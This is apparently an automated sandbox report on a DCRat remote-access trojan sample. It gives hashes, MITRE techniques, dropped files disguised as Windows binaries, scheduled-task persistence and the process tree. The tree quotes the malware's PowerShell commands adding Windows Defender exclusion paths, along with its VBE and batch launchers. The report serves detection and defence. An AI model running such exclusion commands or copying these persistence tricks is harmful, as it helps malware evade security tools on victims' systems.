dcrat | a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef

Analysis

max time kernel
148s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2024, 09:09 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe
Size

1.3MB
MD5

7d483df2f3526ad0416976e70659d522
SHA1

192d8434120956f1b0511a186fcfcdf480b4782b
SHA256

a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef
SHA512

3cc2aeb924ec0d303509ebbf440c02582fb9d8150209808ac1e53b7363a05517c88e9461392b4aa87dfb9c3ca6960b06340c590bdd5b3d13b5c491c93e87e4be
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 45 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4172	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4152	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2140	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5088	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5068	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4148	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1040	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4032	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5020	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3172	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2948	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4120	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3648	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2224	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3128	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3284	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2696	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4624	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4972	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3176	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1436	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4860	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3456	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4692	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1300	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3236	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1348	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4776	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5064	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4640	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4600	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1764	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	508	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4652	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3304	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4996	1544	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3232	1544	schtasks.exe	86

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x000a000000023b9e-9.dat	dcrat
behavioral2/memory/3472-13-0x00000000007A0000-0x00000000008B0000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4244	powershell.exe
3604	powershell.exe
4764	powershell.exe
1784	powershell.exe
4636	powershell.exe
1172	powershell.exe
4564	powershell.exe
1712	powershell.exe
4988	powershell.exe
3552	powershell.exe
2112	powershell.exe
348	powershell.exe
4088	powershell.exe
1884	powershell.exe
3260	powershell.exe
4472	powershell.exe

Checks computer location settings 2 TTPs 18 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	SppExtComObj.exe

Executes dropped EXE 17 IoCs

pid	Process
3472	DllCommonsvc.exe
2548	SppExtComObj.exe
3972	SppExtComObj.exe
3456	SppExtComObj.exe
1380	SppExtComObj.exe
3288	SppExtComObj.exe
3904	SppExtComObj.exe
4972	SppExtComObj.exe
2248	SppExtComObj.exe
2828	SppExtComObj.exe
112	SppExtComObj.exe
2512	SppExtComObj.exe
4616	SppExtComObj.exe
3616	SppExtComObj.exe
3900	SppExtComObj.exe
3612	SppExtComObj.exe
1308	SppExtComObj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs

Web Service

T1102

flow	ioc
40	raw.githubusercontent.com
44	raw.githubusercontent.com
53	raw.githubusercontent.com
55	raw.githubusercontent.com
16	raw.githubusercontent.com
23	raw.githubusercontent.com
24	raw.githubusercontent.com
39	raw.githubusercontent.com
45	raw.githubusercontent.com
47	raw.githubusercontent.com
54	raw.githubusercontent.com
38	raw.githubusercontent.com
46	raw.githubusercontent.com
56	raw.githubusercontent.com
57	raw.githubusercontent.com
15	raw.githubusercontent.com

Drops file in Program Files directory 7 IoCs

description	ioc	Process
File created	C:\Program Files\Internet Explorer\SIGNUP\lsass.exe	DllCommonsvc.exe
File opened for modification	C:\Program Files\Internet Explorer\SIGNUP\lsass.exe	DllCommonsvc.exe
File created	C:\Program Files\Internet Explorer\SIGNUP\6203df4a6bafc7	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\cmd.exe	DllCommonsvc.exe
File created	C:\Program Files\Microsoft Office\root\Licenses16\ebf1f9fa8afd6d	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\9e8d7a4ca61bd9	DllCommonsvc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\bcastdvr\sihost.exe	DllCommonsvc.exe
File created	C:\Windows\bcastdvr\66fc9ff0ee96c2	DllCommonsvc.exe
File created	C:\Windows\Panther\UnattendGC\RuntimeBroker.exe	DllCommonsvc.exe
File created	C:\Windows\Panther\UnattendGC\9e8d7a4ca61bd9	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies registry class 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe
Key created	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings	SppExtComObj.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 45 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4172	schtasks.exe
4148	schtasks.exe
3304	schtasks.exe
4492	schtasks.exe
2948	schtasks.exe
2940	schtasks.exe
5064	schtasks.exe
2336	schtasks.exe
1040	schtasks.exe
4032	schtasks.exe
4972	schtasks.exe
3176	schtasks.exe
4860	schtasks.exe
3456	schtasks.exe
4652	schtasks.exe
4120	schtasks.exe
3648	schtasks.exe
4624	schtasks.exe
4692	schtasks.exe
4640	schtasks.exe
1764	schtasks.exe
3172	schtasks.exe
1436	schtasks.exe
4600	schtasks.exe
508	schtasks.exe
4996	schtasks.exe
1988	schtasks.exe
4152	schtasks.exe
5088	schtasks.exe
2224	schtasks.exe
3128	schtasks.exe
3236	schtasks.exe
4776	schtasks.exe
3232	schtasks.exe
2292	schtasks.exe
1736	schtasks.exe
1732	schtasks.exe
4872	schtasks.exe
1300	schtasks.exe
2140	schtasks.exe
5068	schtasks.exe
5020	schtasks.exe
3284	schtasks.exe
2696	schtasks.exe
1348	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3472	DllCommonsvc.exe
3604	powershell.exe
3604	powershell.exe
2112	powershell.exe
2112	powershell.exe
4472	powershell.exe
4472	powershell.exe
4564	powershell.exe
4564	powershell.exe
3260	powershell.exe
3260	powershell.exe
3552	powershell.exe
3552	powershell.exe
348	powershell.exe
348	powershell.exe
1884	powershell.exe
1884	powershell.exe
4636	powershell.exe
4636	powershell.exe
4764	powershell.exe
4764	powershell.exe
1784	powershell.exe
1784	powershell.exe
4244	powershell.exe
4244	powershell.exe
1712	powershell.exe
1712	powershell.exe
4988	powershell.exe
4988	powershell.exe
4088	powershell.exe
4088	powershell.exe
1172	powershell.exe
1172	powershell.exe
4564	powershell.exe
2112	powershell.exe
3552	powershell.exe
3604	powershell.exe
1784	powershell.exe
1712	powershell.exe
1884	powershell.exe
348	powershell.exe
4472	powershell.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	3472	DllCommonsvc.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	3552	powershell.exe
Token: SeDebugPrivilege	4988	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	4636	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	4244	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	4088	powershell.exe
Token: SeDebugPrivilege	2548	SppExtComObj.exe
Token: SeDebugPrivilege	3972	SppExtComObj.exe
Token: SeDebugPrivilege	3456	SppExtComObj.exe
Token: SeDebugPrivilege	1380	SppExtComObj.exe
Token: SeDebugPrivilege	3288	SppExtComObj.exe
Token: SeDebugPrivilege	3904	SppExtComObj.exe
Token: SeDebugPrivilege	4972	SppExtComObj.exe
Token: SeDebugPrivilege	2248	SppExtComObj.exe
Token: SeDebugPrivilege	2828	SppExtComObj.exe
Token: SeDebugPrivilege	112	SppExtComObj.exe
Token: SeDebugPrivilege	2512	SppExtComObj.exe
Token: SeDebugPrivilege	4616	SppExtComObj.exe
Token: SeDebugPrivilege	3616	SppExtComObj.exe
Token: SeDebugPrivilege	3900	SppExtComObj.exe
Token: SeDebugPrivilege	3612	SppExtComObj.exe
Token: SeDebugPrivilege	1308	SppExtComObj.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5092 wrote to memory of 2392	5092	JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe	82
PID 5092 wrote to memory of 2392	5092	JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe	82
PID 5092 wrote to memory of 2392	5092	JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe	82
PID 2392 wrote to memory of 956	2392	WScript.exe	83
PID 2392 wrote to memory of 956	2392	WScript.exe	83
PID 2392 wrote to memory of 956	2392	WScript.exe	83
PID 956 wrote to memory of 3472	956	cmd.exe	85
PID 956 wrote to memory of 3472	956	cmd.exe	85
PID 3472 wrote to memory of 4088	3472	DllCommonsvc.exe	132
PID 3472 wrote to memory of 4088	3472	DllCommonsvc.exe	132
PID 3472 wrote to memory of 4472	3472	DllCommonsvc.exe	133
PID 3472 wrote to memory of 4472	3472	DllCommonsvc.exe	133
PID 3472 wrote to memory of 1884	3472	DllCommonsvc.exe	134
PID 3472 wrote to memory of 1884	3472	DllCommonsvc.exe	134
PID 3472 wrote to memory of 4564	3472	DllCommonsvc.exe	135
PID 3472 wrote to memory of 4564	3472	DllCommonsvc.exe	135
PID 3472 wrote to memory of 1172	3472	DllCommonsvc.exe	136
PID 3472 wrote to memory of 1172	3472	DllCommonsvc.exe	136
PID 3472 wrote to memory of 348	3472	DllCommonsvc.exe	138
PID 3472 wrote to memory of 348	3472	DllCommonsvc.exe	138
PID 3472 wrote to memory of 3260	3472	DllCommonsvc.exe	139
PID 3472 wrote to memory of 3260	3472	DllCommonsvc.exe	139
PID 3472 wrote to memory of 4636	3472	DllCommonsvc.exe	140
PID 3472 wrote to memory of 4636	3472	DllCommonsvc.exe	140
PID 3472 wrote to memory of 3604	3472	DllCommonsvc.exe	141
PID 3472 wrote to memory of 3604	3472	DllCommonsvc.exe	141
PID 3472 wrote to memory of 4988	3472	DllCommonsvc.exe	142
PID 3472 wrote to memory of 4988	3472	DllCommonsvc.exe	142
PID 3472 wrote to memory of 4244	3472	DllCommonsvc.exe	143
PID 3472 wrote to memory of 4244	3472	DllCommonsvc.exe	143
PID 3472 wrote to memory of 2112	3472	DllCommonsvc.exe	144
PID 3472 wrote to memory of 2112	3472	DllCommonsvc.exe	144
PID 3472 wrote to memory of 1784	3472	DllCommonsvc.exe	145
PID 3472 wrote to memory of 1784	3472	DllCommonsvc.exe	145
PID 3472 wrote to memory of 3552	3472	DllCommonsvc.exe	146
PID 3472 wrote to memory of 3552	3472	DllCommonsvc.exe	146
PID 3472 wrote to memory of 1712	3472	DllCommonsvc.exe	147
PID 3472 wrote to memory of 1712	3472	DllCommonsvc.exe	147
PID 3472 wrote to memory of 4764	3472	DllCommonsvc.exe	148
PID 3472 wrote to memory of 4764	3472	DllCommonsvc.exe	148
PID 3472 wrote to memory of 4556	3472	DllCommonsvc.exe	164
PID 3472 wrote to memory of 4556	3472	DllCommonsvc.exe	164
PID 4556 wrote to memory of 4692	4556	cmd.exe	166
PID 4556 wrote to memory of 4692	4556	cmd.exe	166
PID 4556 wrote to memory of 2548	4556	cmd.exe	170
PID 4556 wrote to memory of 2548	4556	cmd.exe	170
PID 2548 wrote to memory of 2212	2548	SppExtComObj.exe	172
PID 2548 wrote to memory of 2212	2548	SppExtComObj.exe	172
PID 2212 wrote to memory of 1712	2212	cmd.exe	174
PID 2212 wrote to memory of 1712	2212	cmd.exe	174
PID 2212 wrote to memory of 3972	2212	cmd.exe	177
PID 2212 wrote to memory of 3972	2212	cmd.exe	177
PID 3972 wrote to memory of 2128	3972	SppExtComObj.exe	178
PID 3972 wrote to memory of 2128	3972	SppExtComObj.exe	178
PID 2128 wrote to memory of 5096	2128	cmd.exe	180
PID 2128 wrote to memory of 5096	2128	cmd.exe	180
PID 2128 wrote to memory of 3456	2128	cmd.exe	181
PID 2128 wrote to memory of 3456	2128	cmd.exe	181
PID 3456 wrote to memory of 2628	3456	SppExtComObj.exe	182
PID 3456 wrote to memory of 2628	3456	SppExtComObj.exe	182
PID 2628 wrote to memory of 4544	2628	cmd.exe	184
PID 2628 wrote to memory of 4544	2628	cmd.exe	184
PID 2628 wrote to memory of 1380	2628	cmd.exe	187
PID 2628 wrote to memory of 1380	2628	cmd.exe	187

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_a1cf22d235f897eb34dd704b2b79532fc96c33e840e5acd550c8db8092788cef.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5092
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:956
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\SIGNUP\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4472
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\root\Licenses16\cmd.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\StartMenuExperienceHost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\SppExtComObj.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:348
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\bcastdvr\sihost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3260
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4636
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\fontdrvhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\SppExtComObj.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4988
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\My Documents\unsecapp.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4244
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\explorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Music\dllhost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1784
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Videos\SppExtComObj.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
